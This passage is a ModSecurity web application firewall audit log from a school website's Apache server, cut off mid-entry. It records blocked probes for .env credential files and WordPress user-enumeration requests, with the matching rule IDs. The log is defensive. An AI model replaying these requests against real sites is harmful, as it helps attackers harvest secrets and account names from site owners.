--baf9796b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf9796b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747311341153867 829 (- - -) Stopwatch2: 1747311341153867 829; combined=353, p1=310, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf9796b-Z-- --461ee907-A-- [15/May/2025:20:30:18 +0700] aCXsaj0MuKCmW-Q80Ku0agAAAEU 103.236.140.4 49240 103.236.140.4 8181 --461ee907-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --461ee907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461ee907-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315818982620 764 (- - -) Stopwatch2: 1747315818982620 764; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461ee907-Z-- --e3010048-A-- [15/May/2025:20:30:20 +0700] aCXsbH5oxhgjPv2ZXtnYLgAAAIc 103.236.140.4 49242 103.236.140.4 8181 --e3010048-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --e3010048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3010048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315820370159 976 (- - -) Stopwatch2: 1747315820370159 976; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3010048-Z-- --333dbc73-A-- [15/May/2025:20:30:21 +0700] aCXsbT0MuKCmW-Q80Ku0awAAAFI 103.236.140.4 49246 103.236.140.4 8181 --333dbc73-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --333dbc73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --333dbc73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315821038480 746 (- - -) Stopwatch2: 1747315821038480 746; combined=283, p1=248, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --333dbc73-Z-- --8c1f8222-A-- [15/May/2025:20:30:22 +0700] aCXsbu8rcsLSwEaopQLjfwAAAAk 103.236.140.4 49250 103.236.140.4 8181 --8c1f8222-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --8c1f8222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c1f8222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315822426264 688 (- - -) Stopwatch2: 1747315822426264 688; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c1f8222-Z-- --aae6147c-A-- [15/May/2025:20:30:23 +0700] aCXsb0ZPp_O9UFIYjNbB1AAAAM4 103.236.140.4 49252 103.236.140.4 8181 --aae6147c-B-- GET /.env.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --aae6147c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae6147c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315823146518 708 (- - -) Stopwatch2: 1747315823146518 708; combined=267, p1=221, p2=0, p3=0, p4=0, p5=46, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae6147c-Z-- --0f73c70a-A-- [15/May/2025:20:30:24 +0700] aCXscH5oxhgjPv2ZXtnYLwAAAIU 103.236.140.4 49256 103.236.140.4 8181 --0f73c70a-B-- GET /.env.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --0f73c70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f73c70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315824994000 704 (- - -) Stopwatch2: 1747315824994000 704; combined=274, p1=240, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f73c70a-Z-- --a854d747-A-- [15/May/2025:20:30:25 +0700] aCXscUZPp_O9UFIYjNbB1QAAAMY 103.236.140.4 49258 103.236.140.4 8181 --a854d747-B-- GET /beta/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --a854d747-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a854d747-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315825676815 665 (- - -) Stopwatch2: 1747315825676815 665; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a854d747-Z-- --982f9c5e-A-- [15/May/2025:20:30:27 +0700] aCXscz0MuKCmW-Q80Ku0bAAAAEI 103.236.140.4 49262 103.236.140.4 8181 --982f9c5e-B-- GET /beta/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --982f9c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982f9c5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315827151021 683 (- - -) Stopwatch2: 1747315827151021 683; combined=272, p1=240, p2=0, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982f9c5e-Z-- --8da0a110-A-- [15/May/2025:20:30:27 +0700] aCXscz0MuKCmW-Q80Ku0bQAAAE8 103.236.140.4 49266 103.236.140.4 8181 --8da0a110-B-- GET /prod/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --8da0a110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8da0a110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315827875816 693 (- - -) Stopwatch2: 1747315827875816 693; combined=266, p1=224, p2=0, p3=0, p4=0, p5=42, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8da0a110-Z-- --7fd1d35f-A-- [15/May/2025:20:30:29 +0700] aCXsde8rcsLSwEaopQLjhAAAABA 103.236.140.4 49270 103.236.140.4 8181 --7fd1d35f-B-- GET /prod/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --7fd1d35f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fd1d35f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315829047393 670 (- - -) Stopwatch2: 1747315829047393 670; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fd1d35f-Z-- --0c4a1207-A-- [15/May/2025:22:36:39 +0700] aCYKB35oxhgjPv2ZXtnb4QAAAJE 103.236.140.4 33878 103.236.140.4 8181 --0c4a1207-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.68.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.68.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c4a1207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c4a1207-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323399908481 2986 (- - -) Stopwatch2: 1747323399908481 2986; combined=1297, p1=426, p2=837, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c4a1207-Z-- --aeb05b39-A-- [15/May/2025:22:38:46 +0700] aCYKhu8rcsLSwEaopQLm1wAAAA0 103.236.140.4 33888 103.236.140.4 8181 --aeb05b39-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.146.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.146.63.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aeb05b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb05b39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323526857519 3106 (- - -) Stopwatch2: 1747323526857519 3106; combined=1357, p1=420, p2=881, p3=0, p4=0, p5=56, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb05b39-Z-- --e8272860-A-- [15/May/2025:22:40:35 +0700] aCYK80ZPp_O9UFIYjNbH2QAAAMc 103.236.140.4 33896 103.236.140.4 8181 --e8272860-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.0.46.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.0.46.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e8272860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8272860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323635152013 2792 (- - -) Stopwatch2: 1747323635152013 2792; combined=1291, p1=428, p2=834, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8272860-Z-- --a397dd61-A-- [15/May/2025:22:51:40 +0700] aCYNjEZPp_O9UFIYjNbH3QAAAMU 103.236.140.4 34002 103.236.140.4 8181 --a397dd61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.86.192.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.86.192.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a397dd61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a397dd61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747324300168516 2991 (- - -) Stopwatch2: 1747324300168516 2991; combined=1268, p1=416, p2=823, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a397dd61-Z-- --e86b8531-A-- [15/May/2025:22:56:33 +0700] aCYOsX5oxhgjPv2ZXtndhAAAAJI 103.236.140.4 40992 103.236.140.4 8181 --e86b8531-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.196.176.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.196.176.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e86b8531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86b8531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747324593128277 2593 (- - -) Stopwatch2: 1747324593128277 2593; combined=1176, p1=387, p2=759, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86b8531-Z-- --c44c792d-A-- [15/May/2025:23:05:56 +0700] aCYQ5H5oxhgjPv2ZXtnjBAAAAIM 103.236.140.4 39162 103.236.140.4 8181 --c44c792d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.161.42.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c44c792d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c44c792d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747325156703545 2070 (- - -) Stopwatch2: 1747325156703545 2070; combined=1076, p1=357, p2=693, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c44c792d-Z-- --bcde986a-A-- [15/May/2025:23:14:54 +0700] aCYS_j0MuKCmW-Q80KvJSgAAAFA 103.236.140.4 36946 103.236.140.4 8181 --bcde986a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.242.231.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bcde986a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcde986a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747325694124698 2431 (- - -) Stopwatch2: 1747325694124698 2431; combined=1075, p1=347, p2=701, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcde986a-Z-- --eabcf63f-A-- [15/May/2025:23:32:21 +0700] aCYXFT0MuKCmW-Q80KvUAAAAAE8 103.236.140.4 52810 103.236.140.4 8181 --eabcf63f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.240.2.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.240.2.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eabcf63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eabcf63f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive 